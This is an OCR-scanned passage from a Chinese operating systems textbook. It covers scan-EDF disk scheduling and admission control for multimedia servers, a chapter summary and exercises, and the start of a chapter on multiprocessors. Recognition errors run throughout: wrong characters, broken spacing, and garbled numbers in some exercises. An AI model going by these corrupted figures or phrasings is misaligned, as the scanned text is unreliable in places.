度 的 最 终 时 限 ， 所 以 这 样 做 使 模型 更 为 简洁 。 

















当 系统 启动 的 时 候 ， 还 没有 挂 起 的 磁盘 请 求 。 当 第 一 个 请 求 到 来 的 
时 候 ， 它 立即 得 到 服务 。 当 第 一 次 寻 道 发 生 的 时 候 ， 其 他 请 求 可 能 到 
来 ， 所 以 当 第 一 次 请 求 结束 的 时 候 ， 磁 盘 驱 动 咒 可 能 要 选择 下 一 次 处 理 
哪个 请 求 。 茶 个 请 求 被 选中 并 开始 得 到 处 理 。 当 该 请 求 结束 的 时 候 ， 再 
一 次 有 一 组 可 能 的 请 求 : 它们 是 第 一 次 没有 被 选中 的 请 求 和 第 二 个 请 求 
正在 被 处 理 的 时 候 新 到 来 的 请 求 。 一 般 而 言 ， 只 要 一 个 磁盘 请 求 完 成 ， 
磁盘 驱动 器 束 有 奋 干 组 挂 起 的 请 求 ， 必 须 从 中 做 出 选择 。 问 题 是 :“ 使 














用 什么 算法 选择 下 一 个 要 服务 的 请 求 ? ” 





在 选择 下 一 个 磁盘 请 求 时 ， 有 两 个 因素 起 着 重要 的 作用 : 最 终 时限 
和 柱 面 。 从 性 能 的 观点 来 看 ， 保 持 请 求 存放 在 柱 面 上 并 且 使 用 电梯 算法 
可 以 将 总 寻 道 时 间 最 小 化 ， 但 是 可 能 导致 存放 在 边缘 柱 面 上 的 请 求 错 过 
其 最 终 时 限 。 从 实时 的 观点 来 看 ， 将 请 求 按照 最 终 时 限 排序 并 且 以 最 终 
时 限 的 顺序 对 它们 进行 处 理 ， 可 以 将 错过 最 终 时 限 的 机 会 最 小 化 ， 但 是 
可 能 增加 总 寻 道 时 间 。 














使 用 scan-EDF 算 法 (scan-EDF algorithm) (Reddy 和 Wyllie， 

1994) 可 以 将 这 两 个 因素 结合 起 来 。 这 一 算法 的 思想 是 ， 将 最 终 时 限 比 
较 接近 的 请 求 收集 在 一 起 分 成 若干 批 ， 并 且 以 柱 面 的 顺序 对 其 进行 处 
理 。 作 为 一 个 例子 ， 我 们 考虑 图 7-27 当 t=700 时 的 情形 。 磁 盘 驱 动 器 知道 
它 有 11 个 挂 起 的 请 求 ， 这 些 请 求 具 有 不 同 的 最 终 时 限 和 不 同 的 柱 面 。 它 
可 以 决定 将 具有 最 早 的 最 终 时 限 的 5 个 请 求 视 为 一 批 ， 将 它们 按照 柱 面 
号 排序 ， 并 且 使 用 电梯 算法 以 柱 面 顺序 对 它们 进行 服务 。 于 是 ， 顺 序 将 
是 110、330、440、676 和 680。 只 要 每 个 请 求 能 够 在 其 最 终 时 限 之 前 完 
成 ， 这 些 请 求 就 可 以 安全 地 重新 排列 ， 从 而 将 所 需 的 总 寻 道 时 间 最 小 
化 

















请 求 〈 按 照 最 终 时 限 排序 ) 


分 批 在 一 起 





柱 面 220 755 280 550 812 103 
700 710 720 730 740 750 


最 终 时 限 Cms) 一 > 


图 7-27 scan-EDF 算 法 使 用 最 终 时 限 和 柱 面 号 进行 调度 


如 末 不 同 的 视频 流 具 有 不 同 的 数据 率 ， 那 么 当 一 个 新 的 客户 出 现时 
将 引起 一 个 严重 的 问题 ， 该 客户 是 否 应 该 被 接纳 ? 如 果 接 纳 该 客户 会 导 
致 其 他 的 视频 流 频 索 地 错过 它们 的 最 终 时 限 ， 那 么 答案 可 能 就 是 否 。 存 
在 两 种 方法 计算 是 否 接纳 新 的 客户 。 一 种 方法 是 假设 每 个 客户 平均 地 需 
要 某 些 数量 的 资源 ， 如 磁盘 人 带宽、 内 存 缓冲 区 、CPU 时 间 等 。 如 宋 剩 下 
的 每 一 资源 对 于 一 个 平均 的 顾客 来 说 都 是 足够 的 ， 则 接纳 新 的 客户 。 

















另 一 种 算法 更 为 复杂 。 它 要 关注 新 顾客 想 要 看 的 特定 的 电影 ， 碍 找 
该 电影 的 (预先 计算 的 ) 数据 率 ， 而 对 于 黑白 片 和 彩色 片 、 卡 通 片 和 故 
事 片 、 爱 情 片 和 战争 片 ， 数 据 率 都 不 相同 。 爱 情 片 运动 缓慢 ， 具 有 较 长 
的 场景 和 缓慢 的 淡 入 淡出 ， 所 有 这 些 都 会 充分 得 到 压缩 ， 而 战争 片 具 有 
许多 快速 的 切换 和 迅速 的 运动 ， 因 此 具有 许多 I 帧 和 较 大 的 P 帧 。 如 果 服 
务 圳 对 于 新 客户 想 要 看 的 电影 而 言 具 有 足够 的 容量 ， 那 么 咒 准 许 接纳 ， 
否则 就 拒绝 接纳 。 














7.10 BRE RAW I 





多 媒体 是 近 些 年 的 热门 课题 ， 所 以 有 相当 多 数量 关于 多 媒体 的 研 
究 。 这 些 研 究 中 有 许多 是 关于 内 容 、 构 造 工 具 和 应 用 的 ， 而 这 些 都 超出 
了 本 书 的 范围 。 另 一 个 热门 领域 是 多 媒体 与 网 络 ， 这 也 超出 了 本 书 范 
围 。 但 是 关于 多 媒体 服务 器 的 研究 ， 尤 其 是 分 布 式 服务 器 与 操作 系统 是 
相关 的 《Sarhan 和 Das,2004; Matthur 和 Mundur,2004; Zaia 等 人 ， 

2004) ; 支持 多 媒体 的 文件 系统 也 是 与 操作 系统 相关 的 研究 〈Ahn 等 
人 ，2004; Cheng 等 人 ，2005; Kang 等 人 ，2006; Park 和 Ohm， 





2006) 。 


HH 


优秀 的 音频 和 视频 编码 (尤其 是 3D 应 用 〉 对 于 高 性 能 是 很 关键 
的 。 因 此 ， 这 些 课题 也 引起 了 相当 程度 的 关注 (Chattopadhyay 等 人 ， 
2006; Hari 等 人 ，2006; Kum 和 Mayer-Patel,2006) 。 


服务 质量 对 多 媒体 系统 非常 重要 ， 上 所 以 吸引 了 相当 的 关注 〈Childs 
和 Ingram，2001; Tamai 等 人 ，2004) 。 与 服务 质量 有 关 的 还 有 调度 ， 
以 及 CPU (Etsion 等 人 ，2004; Etsion 等 人 ，2006; Nieh 和 Lam，2003; 
Yuan 和 Nahrstedt，2006) 和 硬盘 (Lund 和 Goebel，2003; Reddy 等 人 ， 


2005) 。 





在 为 付费 客户 提供 多 媒体 广播 编排 服务 时 ， 安 全 就 变 得 很 重要 了 ， 


所 以 这 个 课题 也 受到 了 关注 Barni，2006。 


pA a 


多 媒体 是 一 种 非常 有 前 途 的 计算 机 应 用 。 由 于 多 媒体 文件 的 巨大 和 
苛刻 的 实时 回放 要 求 ， 为 文本 而 设计 的 操作 系统 对 于 多 媒体 而 言 不 是 最 
理想 的 。 多 媒体 文件 包含 多 重 平 行 的 轨迹 ， 通 常 有 一 个 视频 轨迹 和 至 少 
一 个 音频 轨迹 ， 有 了 时 还 有 一 些 字 大 轨迹 。 在 回放 期 间 ， 这 些 轨 迹 都 必须 
保持 同步 。 








音频 通过 周期 性 地 对 音量 进行 采样 而 得 以 记录 下 来 ， 通 常 每 秒 采 样 
44 100 次 (针对 CD 质量 的 声音 ) 。 压 缩 可 以 应 用 于 音频 信号 ， 得 到 大 约 
10 倍 的 均匀 的 压缩 率 。 视 频 压缩 可 以 使 用 帧 内 压缩 (JPEG) ， 也 可 以 
使 用 帧 间 压 缩 CMPEG) 。 后 者 将 P 帧 表示 为 与 前 一 帧 的 差 ， 而 B 帧 则 既 
可 以 基于 前 面 的 帧 ， 也 可 以 基于 后 面 的 帧 。 

















多 媒体 需要 实时 调度 以 便 满 足 其 最 终 时 限 。 通 常 使 用 的 算法 有 两 
个 。 第 一 个 算法 是 速率 单调 调度 ， 它 是 一 个 静态 抢先 算法 ， 它 根据 进程 
的 周期 将 固定 的 优先 级 分 配给 进程 。 第 二 个 算法 是 最 早 最 终 时 限 优 先 调 
度 ， 它 是 一 个 动态 算法 ， 总 是 选择 具有 最 近 最 终 时 限 的 进程 。EDF 更 复 
一些， 但 是 它 可 以 达到 100% 的 利用 率 ， 而 RMS 有 时 不 能 达到 。 

















多 媒体 文件 系统 通常 使 用 推送 型 模型 而 不 是 拉 取 型 模型 。 一 旦 开始 
一 个 视频 流 ， 则 数据 位 就 从 服务 右 不 断 流出 而 不 需要 用 户 进 一 步 请 求 。 


这 一 方法 从 根本 上 不 同 于 常规 的 操作 系统 ， 但 是 为 了 满足 实时 要 求 这 样 
做 是 必要 的 。 





文件 可 以 连续 存放 也 可 以 不 连续 存放 。 在 后 一 种 情况 下 ， 存 储 单 位 
可 以 是 可 变 长 度 的 《一 个 磁盘 块 是 一 帧 ) ， 也 可 以 是 固定 长 度 的 《一 个 
磁盘 英 是 多 个 帧 )。 这 些 方法 具有 不 同 的 权衡 。 








磁盘 上 文件 的 存放 格局 影响 着 系统 的 性 能 。 当 存在 多 个 文件 时 ， 有 
时 使 用 风 苓 管 算 法 。 横 路 多 个 磁盘 将 文件 分 成 条 带 〈 无 论 是 宽 条 带 还 是 
eR) 也 是 常用 的 。 为 了 改进 性 能 ， 人 磁盘 块 与 文件 蜗 速 缓存 策略 也 得 
到 了 广泛 的 利用 。 





习题 


1. 未 压缩 的 黑白 NTSC 电 视 能 人 否 通过 快速 以 太 网 发 送 ? 如 果 可 以 的 
话 ， 同 时 可 以 及 送 多 少 个 频道 ? 





2.HDTV 的 水 平分 辨 紊 是 常规 电视 的 两 倍 〈(1280 像 素 对 640 像 素 ) 。 
利用 正文 中 提供 的 信息 ， 它 需要 的 带宽 比 标准 电视 多 多 少 ? 


3. 在 图 7-3 中 ， 对 于 快 进 和 快 倒 存 在 着 单独 的 文件 。 如 果 一 台 视 频 服 
务 句 还 打算 支持 慢 动作 ， 那 么 对 于 前 进 方 辐 的 慢 动 作 是 否 需 要 为 一 个 文 
(F? 后 倒 的 方向 如 何 ? 





4. 声 音信 号 用 16 位 有 符号 数 〈1 个 符号 位 ，15 个 数值 位 ) 采样 。 以 
百分比 表示 的 最 大 量化 噪声 是 多 少 ? 对 于 长 笛 协 委 曲 或 摇滚 音 乐 这 是 不 
征 一 个 大 问题 ， 或 者 对 于 两 者 是 不 是 问题 相同 ?请 解释 你 的 答案 。 




















5. 唱 片 公司 能 够 使 用 20 位 采样 制作 数字 唱片 的 母 片 ， 最 终 发 行 给 听 
众 的 唱片 使 用 的 是 16 位 采样 。 请 提出 一 种 方法 来 减少 量化 噪声 的 影响 ， 
并 讨论 你 的 方案 的 优点 和 缺点 。 








6.DCT 变 换 使 用 8x8 的 块 ， 但 是 用 于 运动 补偿 的 算法 使 用 16x16 的 
块 。 这 一 差异 是 否 会 导致 问题 ? 如 果 是 的 话 ， 在 MPEG 中 这 个 问题 是 怎 
样 解决 的 ? 





7. 在 图 7-10 中 ， 我 们 看 到 对 于 静止 的 背景 和 运动 角色 MPEG 是 如 何 
工作 的 。 假 设 一 个 MPEG 视 频 是 由 这 样 的 场景 制作 的 : 在 该 场景 中 摄像 
机 被 安 厂 在 一 个 三 脚 架 上 并 且 从 左 到 右 摇动 镜头 ， 摇 动 的 速度 使 得 没有 
两 幅 连 续 的 帧 是 相同 的 。 现 在 是 不 是 所 有 的 帧 都 必须 是 I 帧 ?为 什么 ? 








8. 假 设 图 7-13 中 的 三 个 进程 中 的 每 个 进程 都 伴随 一 个 进程 ， 该 进程 
文 持 一 个 音频 流 按 照 与 视频 进程 相同 的 周期 播放 ， 那 么 音频 缓冲 区 可 以 
在 视频 帧 之 间 得 到 更 新 。 所 有 这 三 个 音频 进程 都 是 完全 相同 的 。 对 于 一 
个 首 频 进程 的 每 一 次 突 发 ， 有 多 少 可 用 的 CPU 时 间 ? 








9. 两 个 实时 进程 在 一 台 计 算 机 上 运行 ， 第 一 个 进程 每 5ms 运 行 


10ms， 第 二 个 进程 每 40ms 运 行 15ms。RMS 对 于 它们 是 否 总 是 起 作用 ? 





10. 一 台 视 频 服务 器 的 CPU 利 用 率 是 65%。 采 用 RMS 调 度 该 服务 器 可 
以 放映 多 少 部 电影 ? 


11. 在 图 7-15 中 ，EDF 算 法 保持 CPU 100% 忙 碌 直 到 t=150 的 时 刻 ， 它 
不 能 保持 CPU 无 限期 地 忙碌 ， 因 为 CPU 每 秒 只 有 975ms 的 工作 要 做 。 扩 
展 该 图 到 150ms 之 后 并 确定 采用 EDF 算 法 CPU 何 时 首次 变 为 空闲 。 


12.DVD 可 以 保存 足够 的 数据 用 于 全 长 的 电影 并 且 传输 率 足 够 显示 
电视 质量 的 节目 。 为 什么 视频 服务 器 不 采用 许多 DVD 驱 动 占 的 “储存 
库 ” 作 为 数据 源 ? 





13. 近 似 视频 点 播 系 统 的 操作 员 发 现 某 个 城市 的 人 们 不 愿意 为 电影 
开始 而 等 竺 超过 6 分 钟 的 时 间 。 对 于 一 部 3 小 时 的 电影 ， 需 要 多 少 个 并 行 
的 数据 流 ? 


14. 考 虑 一 个 采用 Abram-Profeta 与 Shin 提 出 的 方法 的 系统 ， 在 这 个 系 
统 中 视频 服务 器 操作 员 希 望 客户 能 够 完全 在 本 地 问 前 或 网 后 搜索 1 分 
钟 。 假 设 视 频 流 是 速率 为 4 Mbps 的 MPEG-2， 每 个 客户 在 本 地 必须 有 多 
大 的 缓冲 区 空间 ? 





15. 考 虑 Abam-Profeta 和 Shin 方 法 。 如 果 用 户 用 大 小 为 50MB 的 RAM 
用 来 缓冲 ， 那 么 一 个 2Mbps 的 视频 流 的 AT 是 多 少 ? 


16. 一 个 HDTV 视频 点 播 系 统 使 用 图 7-20a 的 小 块 模型 ， 磁 盘 块 大 小 
为 IKB。 如 果 视 频 分 辨 率 为 1280x720 并 且 数 据 流 速率 为 12 Mbps, HSA 
在 一 部 采用 NTSC 制 式 的 2 小 时 长 的 电影 中 有 和 多少 磁 盘 空 间 浪 费 在 内 部 碎 
片上 ? 


17. 针 对 NTSC 和 PAL 思 考 图 7-20a 的 存储 分 配方 法 。 对 于 给 定 的 磁盘 
块 和 影片 大 小 ， 是 否 一 种 制式 比 另 一 种 制式 具有 更 多 的 内 部 碎片 ? 如 果 
是 的 话 ， 哪 一 种 制式 要 好 一 些 ? 为 什么 ? 


18. 考 虑 图 7-20 所 示 的 两 种 选择 。 同 HDTV 的 转换 是 否 更 有 利于 其 中 
的 一 种 系统 ? 请 讨论 。 


19. 考 虑 一 个 系统 ， 它 有 2KB 磁 盘 块 ， 能 存储 2 小 时 的 PAL 制 电影 ， 
平均 每 帧 16KB。 那 么 用 小 磁盘 块 存储 方法 平均 浪费 空间 是 多 少 ? 





20. 上 例 中 ， 如 果 每 帧 项 需要 8 字 节 ， 其 中 有 1 字 节 用 来 指示 每 帧 的 
磁盘 块 写 ， 那 么 可 能 存储 的 最 长 的 电影 大 小 是 多 少 ? 


21. 当 每 一 个 帧 集合 的 大 小 相同 时 ，Chen 与 Thapar 的 近似 视频 点 播 方 
法 工作 得 最 为 出 色 。 假 设 一 部 电影 正在 用 同时 发 出 的 24 个 数据 流 播放 ， 
并 且 10 帧 中 有 1 帧 是 I 巾 。 再 假设 ! 帧 的 大 小 是 P 帧 的 10 倍 ，B 帧 的 大 小 与 P 
帧 相同 。 一 个 等 于 4 个 I 帧 和 20 个 P 帧 的 缓冲 区 不 够 大 的 概率 是 多 少 ? 你 
认为 这 样 的 一 个 缓冲 区 大 小 是 可 接受 的 吗 ? 为 了 使 问题 易于 处 理 ， 假 设 
在 数据 流 中 帧 的 类 型 是 随机 且 独 立 分 布 的 。 





22. 对 于 Chen 和 Thapar 方 法 ， 假 设 有 5 个 轨道 需要 8I- 帧 ，35 个 轨道 需 
要 5I- 帧 ，45 个 轨道 需要 3I- 帧 ，15 个 帧 从 1 到 2 由 中 选择 ， 如 果 我 们 想 保 
证 95 帧 能 被 缓冲 器 容纳 ， 那 么 缓冲 器 的 大 小 应 该 是 多 少 ? 


23. 对 于 Chen 和 Thapar 方 法 ， 假 定 有 一 个 用 PAL 制 格式 编码 的 3 小 时 


电影 ， 需 要 在 每 个 15 分 钟 内 流出 。 那 么 需要 多 少 个 并 发 流 ? 








24. 图 7-18 的 最 终结 果 是 播放 点 不 再 处 于 缓冲 区 的 中 间 。 设 计 一 个 方 
案 ， 最 少 在 播放 点 之 后 有 5 分 钟 并 且 在 播放 点 之 前 有 5 分 钟 。 你 可 以 做 出 


任何 合理 的 假设 ,但 是 陈述 要 清楚 。 





25. 图 7-19 的 设计 要 求 所 有 语言 轨迹 在 每 一 由 上 读 出 。 假 设 视频 服务 
需 的 设计 者 必须 文 持 大 量 的 语言 ， 但 是 不 想 将 这 么 多 的 RAM 投 入 给 组 
冲 区 以 保存 每 一 帧 。 其 他 可 利用 的 选择 是 什么 ? 每 一 种 选择 的 优点 和 缺 


扩 是 什么 ? 








26. 一 人 台 小 的 视频 服务 器 具有 8 部 电影 。 对 于 最 流行 的 电影 、 第 二 流 
行 的 电影 ， 直 到 最 不 流行 的 电影 ，Zipf 定 律 预 测 的 概率 是 多 少 ? 


27. 一 块 具有 1000 个 柱 面 的 14GB 的 磁盘 用 于 保存 以 4 Mbps 速 率 流动 
的 1000 个 30 秒 的 MPEG-2 视 频 剪 辑 。 这 些 视频 剪辑 根据 管风琴 算法 存 
放 。 依 照 Zipf 定 律 ， 磁 盘 臂 花 在 中 间 10 个 柱 面 的 时 间 比 例 是 多 少 ? 


28. 假 设 对 于 影片 A、B、C 和 DD 的 相对 需求 由 Zipf 定 律 所 挡 述 ， 对 于 
如 图 7-24 中 所 示 的 四 种 划分 条 带 的 方法 ， 四 块 磁盘 的 期 望 相对 利用 率 是 


多 少 ? 


29. 两 个 视频 点 播客 户 相隔 6 秒 钟 开 始 观 看 同一 部 PAL 电 影 。 如 果 系 
统 加 快 一 个 数据 流 并 且 减 慢 另 一 个 数据 流 以 便 使 它们 合并 ， 为 了 在 3 分 
钟 内 将 它们 合并 ， 需 要 的 加 速 / 减 速 百分比 是 多 少 ? 

30. 一 台 MPEG-2 视 频 服 务 器 对 于 NTSC 视 频 使 用 图 7-26 的 回环 方 


法 。 所 有 的 视频 流出 自 一 个 转速 为 10 800 rpm 的 UltraWide SCSI 磁 盘 ， 磁 
盘 的 平均 寻 道 时 间 是 3ms。 能 够 得 到 支持 的 数据 流 有 多 少 ? 


31. 重 做 前 一 个 习题 ， 但 是 现在 假设 scan-EDF 算 法 将 平均 寻 道 时 间 
减少 了 20%。 现 在 能 够 得 到 支持 的 数据 流 有 和 多少? 


32. 考 虑 到 下 面 一 系列 对 磁盘 的 需求 ， 每 个 需求 由 一 个 元 组 (截止 
时 间 (ms) ， 柱 面 ) 代表 。 使 用 scan_EDF 算 法 后 ， 四 个 即将 到 期 的 需 
求 聚 集 在 一 起 得 到 服务 。 如 果 服 务 每 个 请 求 的 平均 时 间 是 6ms， 那 么 有 
没有 错过 的 终止 时 间 ? (32300); (36500); (40210); (34 310) 假 定 当前 
时 间 是 15ms。 


33. 再 次 重 做 前 一 个 习题 ， 但 是 现在 假设 每 一 帧 在 四 块 磁盘 上 分 成 
条 带 ， 在 每 块 磁盘 上 scan-EDF 算 法 将 平均 寻 道 时 间 减 少 了 20%。 现 在 能 
够 得 到 文 持 的 数据 流 有 多 少 ? 


34. 正 文 描述 了 使 用 五 个 数据 请 求 为 一 批 来 调度 在 图 7-27a 中 所 描述 
的 情形 。 如 果 所 有 请 求 需要 等 量 的 时 间 ， 在 这 个 例子 中 每 个 请 求 可 以 允 
许 的 最 大 时 间 是 多 少 ? 





35. 供 生成 计算 机 “墙纸 ”的 许多 位 图 图 像 使 用 很 少 的 颜色 并 且 十 分 容 
易 压 缩 。 一 种 简单 的 压缩 方法 是 : 选择 一 个 不 在 输入 文件 中 出 现 的 数据 
值 ， 并 且 将 其 用 作 一 个 标志 。 一 个 字 节 一 个 字 节 地 读 取 文件 ， 寻 找 重复 
的 字 节 值 。 将 单个 值 和 了 最 多 重复 三 次 的 字 节 直接 复制 到 输出 文件 。 当 4 
个 或 更 多 字 市 的 重复 串 被 发 现时 ， 将 一 个 由 3 个 字 节 组 成 的 串 写 到 输出 
文件 ， 这 3 个 字 市 的 串 包括 标志 字 节 、 指 示 从 4 到 255 计 数 的 字 市 和 在 输 











入 文件 中 发 现 的 实际 的 值 。 使 用 该 算法 编写 一 个 压缩 程序 ， 以 及 一 个 能 
够 恢复 原始 文件 的 解压 缩 程 序 。 额 外 要 求 : 如何 处 理 在 数据 中 包含 标志 
PAH? 








36. 计 算 机 动画 是 通过 显示 具有 微小 差异 的 图 像 序 列 实现 的 。 编 写 
一 个 程序 ， 计 算 两 幅 具 有 相同 尺寸 的 未 压 红 位 图 图 像 之 间 的 字 市 和 字 市 
的 兰 。 当 然 ， 输 出 文件 应 该 与 输入 文件 具有 相同 的 大 小 。 使 用 这 一 差 什 
文件 作为 前 一 个 习题 中 的 压缩 程序 的 输入 ， 并 且 将 这 一 方法 的 效率 和 压 
缩 单 个 图 像 的 情况 进行 比较 。 


37. 实 现 教 材 中 的 基本 RMS 和 EDF 算 法 。 程 序 的 主要 输入 是 一 个 有 
若干 行 的 文件 ， 每 行 代表 一 个 进程 的 CPU 请 求 ， 并 且 有 如 下 的 参数 : 周 
期 CE) 、 计 算 时 间 〈 秒 ) 、 开 始 时 间 〈 秒 ) 、 结 束 时 间 CD) 。 在 以 
下 方面 对 比 两 个 算法 : a) 由 于 CPU 的 不 可 调度 性 导致 平均 被 阻塞 的 CPU 
请 求 数 ，b) 平 均 CPU 使 用 率 ; co) 每 个 CPU 请 求 的 平均 等 待 时 间 ; d) 错 过 
截止 时 间 的 请 求 平均 数量 。 





38. 实 现存 储 多 媒体 文件 的 常量 时 间 长 度 和 常量 数据 长 度 的 技术 。 
程序 的 主要 输入 是 一 系列 文件 ， 每 个 文件 包含 一 个 MPEG-2 压 缩 多 媒体 
文件 (如 电影 ， 的 每 帧 元 数据 。 元 数据 包括 帧 类 型 (VP/B，、 帧 长 、 相 
关联 的 音频 帧 等 。 对 于 不 同文 件 块 大 小 ， 就 需要 的 总 存储 空间 大 小 、 肖 
费 的 磁盘 存储 空间 和 平均 RAM 需 求 三 个 方面 比较 两 种 技术 。 





39. 在 上 面 的 程序 上 添加 一 个 “读者 ”程序 ， 它 随机 地 从 上 面 的 输入 列 
表 中 选择 文件 ， 使 用 VCR 功 能 的 视频 后 播 或 准 视频 点 播 。 实 现 scan-EDF 
算法 以 便 能 够 给 出 磁盘 读 请 求 。 惑 每 个 文件 的 平均 寻找 磁盘 次 数 比较 锦 
量 时 间 长 度 和 第 量 数 据 长 度 这 两 个 方法 。 


第 8 革 ”多 处 理 机 系统 


从 计算 机 诞生 之 日 起 ， 人 们 对 更 强 计算 能 力 的 无 休止 的 奶 求 就 一 直 
驱使 着 计算 机 工业 的 发 展 。ENIAC 可 以 完成 每 秒 300 次 的 运算 ， 它 一 下 
子 就 比 以 往 任何 计算 器 都 快 1000 多 倍 ， 但 是 人 们 并 不 满足 。 我 们 现在 有 
了 比 ENIAC 快 数 百 万 倍 的 机 器 ， 但 是 还 有 对 更 强大 机 器 的 需求 。 天 文学 
家 们 正在 了 解 宇 宙 ， 和 生物 学 家 正在 试图 理解 人 类 基因 的 含义 ， 航 空 工程 
师 们 致力 于 建造 更 安全 和 速度 更 快 的 飞机 ， 而 所 有 这 一 切 都 需要 更 多 的 
CPU 周 期 。 然 而 ， 即 使 有 更 多 运算 能 力 ， 仍 然 不 能 满足 需求 。 











过 去 的 解决 方案 是 使 时 钟 走 得 更 快 。 但 是 ， 现 在 开始 遇 到 对 时 钟 速 
度 的 限制 了 。 按 照 爱 因 斯 坦 的 相对 论 ， 电 子 信号 的 速度 不 可 能 超过 光 
速 ， 这 个 速度 在 真空 中 大 约 是 30cm/ns， 而 在 铜 线 或 光纤 中 约 是 
20cm/ns。 这 在 计算 机 中 意味 着 10GHz 的 时 钟 ， 信 号 的 传送 距离 总 共 不 
会 超过 2cm。 对 于 100GHz 的 计算 机 ， 整 个 传送 路 径 长 度 最 多 为 2mm。 而 
壬 一 台 1THz (1000GHz) 的 计算 机 中 ， 传 送 距 离 就 不 足 100hm 了 ， 这 在 
一 个 时 钟 周 期 内 正好 让 信号 从 一 端 到 另 一 端 并 返回 。 





让 计算 机 变 得 如 此 之 小 是 可 能 的 ， 但 是 这 会 遇 到 男 一 个 基本 问题 : 
散热 。 计 算 机 运行 得 越 快 ， 产 生 的 热量 就 越 多 ， 而 计算 机 越 小 就 越 难 散 
热 。 在 高 端 Pentium 系 统 中 ，CPU 的 散热 器 已 经 比 CPU 自身 还 要 大 了 。 
总 而 言 之 ， 从 1MHz 到 1GHz 需 要 的 是 更 好 的 芯片 制造 工艺 ， 而 从 1GHz 








到 1THz 则 需要 完全 不 同 的 方法 。 


获得 更 高 速度 的 一 种 处 理 方式 是 大 规模 使 用 并 行 计算 机 。 这 些 机 器 
有 许多 CPU， 每 一 个 都 以 * 通 常 ” 的 速度 〈 在 一 个 给 定年 份 中 的 速度 ) 运 
行 ， 但 是 总 体 上 会 有 比 单 个 CPU 强大 得 多 的 计算 能 力 。 具 有 1000 个 CPU 
的 系统 已 经 商业 化 了 。 在 未 来 十 年 中 ， 可 能 会 建造 出 具有 100 万 个 CPU 
的 系统 。 当 然 为 了 获得 更 高 的 速度 ， 还 有 其 他 潜在 的 处 理 方式 ， 如 生物 
计算 机 ， 但 在 本 章 中 ， 我 们 将 专注 于 有 多 个 普通 CPU 的 系统 。 

















在 高 强度 的 数据 处 理 中 经 常 采用 高 度 并 行 计算 机 。 如 天 气 预测 、 围 
绕 机 可 的 气流 建 模 、 世 界 经 济 模 拟 或 理解 大 脑 中 药物 - 受 体 的 相互 作用 
等 问题 都 是 计算 密集 型 的 。 解 决 这 些 问 题 需要 多 个 CPU 同时 长 时 间 运 
行 。 在 本 章 中 讨论 的 多 处 理 机 系统 被 广泛 地 用 于 解决 这 些 问题 以 及 在 其 
他 科学 、 工 程 领 域 中 的 类 似 问 题 。 





另 一 个 相关 的 进展 是 因特网 不 可 思议 地 快速 增长 。 因 特 网 最 初 被 设 
计 为 一 个 车 用 的 容错 控制 系统 的 原型 ， 然 后 在 从 事 学 术 研 究 的 计算 机 科 
学 家 中 流行 开 来 ， 并 且 在 过 去 它 已 经 获得 了 许多 新 用 途 。 其 中 一 种 用 途 
是 ， 把 全 世界 的 数 干 台 计算 机 连接 起 来 ， 共 同 处 理 大 型 的 科学 问题 。 在 
某 种 意义 上 ， 一 个 包含 有 分 布 在 全 世界 的 1000 台 计算 机 的 系统 与 在 一 个 
房间 中 有 1000 台 计算 机 的 系统 之 间 没 有 差别 ， 尺 管 这 两 个 系统 在 延 时 和 
其 他 技术 特征 方面 会 有 所 不 同 。 在 本 章 中 我 们 也 将 讨论 这 些 系统 。 








假如 有 足够 多 的 资金 和 足够 大 的 房间 ， 把 一 百 万 台 无 天 的 计算 机 放 
到 一 个 房间 中 很 容易 做 到 。 把 一 百 万 全 无关 的 计算 机 放 到 全 世界 就 更 容 
易 了 ， 因 为 不 存在 第 二 个 问题 了 。 当 要 在 一 个 房间 中 使 这 些 计 算 机 相互 
通信 ， 以 便 共同 处 理 一 个 问题 时 ， 问 题 就 出 现 了 。 结 果 ， 人 们 在 互 连 技 
术 方 面 做 了 大 量 工作 ， 而 且 不 同 的 互 连 技术 已 经 导致 了 不 同性 质 的 系统 
以 及 不 同 的 软件 组 织 。 























在 电子 《或 光学 ) 部 件 之 间 的 所 有 通信 ， 归 根 结 底 是 在 它们 之 间 发 
送 消息 。 其 差别 在 于 所 涉及 的 时 
间 范 围 、 距 离 范 围 和 风 辑 组 织 。 一 个 极端 的 例子 是 共享 存储 器 多 处 理 
机 ， 系 统 中 有 从 2 个 到 1000 个 的 CPU 通过 一 个 共享 存储 器 通信 。 在 这 个 
模型 中 ， 每 个 CPU 可 同样 访问 整个 物理 存储 器 ， 可 使 用 指令 LOAD 和 
STORE 读 写 单个 的 字 。 访 问 一 个 存储 右 字 通 币 需要 2 一 10ns。 尽 管 这 个 
模型 ， 如 图 8-1a 所 示 ， 看 来 很 简单 ， 但 是 实际 上 要 实现 它 并 不 那么 简 
单 ， 而 且 通 常 涉及 底层 大 量 的 消 恩 传递 ， 这 一 点 我 们 会 位 要 地 加 以 说 
明 。 不 过 ， 该 消息 传递 对 于 程序 员 来 说 是 不 可 见 的 。 














其 次 是 图 8-1b 中 的 系统 ， 许 多 CPU- 存 储 器 通过 某 种 高 速 互连网 络 连 
接 在 一 起 。 这 种 系统 称 为 消息 传递 型 多 计算 机 。 每 个 存储 器 局 部 对 应 一 
个 CPU， 且 只 能 被 该 CPU 访问 。 这 些 CPU 通过 互连网 络 发 送 多 字 消 息 通 
信 。 存 在 良好 的 连接 时 ， 一 条 短 消息 可 在 10 一 50hs 之 内 发 出 ， 但 是 这 仍 
然 比 图 8-1a 中 系统 的 存储 器 访问 时 间 长 。 在 这 种 设计 中 没有 全 局 共享 的 


存储 器 。 多 计算 机 (消息 传递 系统 ) 比 (共享 存储 器 〉 多 处 理 机 系统 容 
易 构 建 ， 但 是 编程 比较 困难 。 可 见 ， 每 种 类 型 各 有 其 优点 。 


本 地 存 依 器 、、 





图 8-1 a) 共享 存储 器 多 处 理 机 ; b) 消 息 传递 多 计算 机 ; YO ADA A 


第 三 种 模型 参见 图 8-1c， 所 有 的 计算 机 系统 都 通过 一 个 广域网 连接 
起 来 ， 如 因特网 ， 构 成 了 一 个 分 布 式 系统 (distributed system) 。 每 台 
计算 机 有 自己 的 存储 器 ， 当 然 ， 通 过 消息 传递 进行 系统 通信 。 图 8-1b 和 
图 8-1c 之 间 真 正 惟 一 的 差别 是 ， 后 者 使 用 了 完整 的 计算 机 而 且 消 息 传 递 
时 间 通 常 需 要 10 一 100ms。 如 此 长 的 延迟 造成 使 用 这 类 松散 耦合 系统 的 
方式 和 图 8-lb 中 的 紧密 耦合 系统 不 同 。 三 种 类 型 的 系统 在 通信 延迟 上 各 
不 相同 ， 分 别 有 三 个 数量 级 的 差别 。 类 似 于 一 天 和 三 年 的 差别 。 


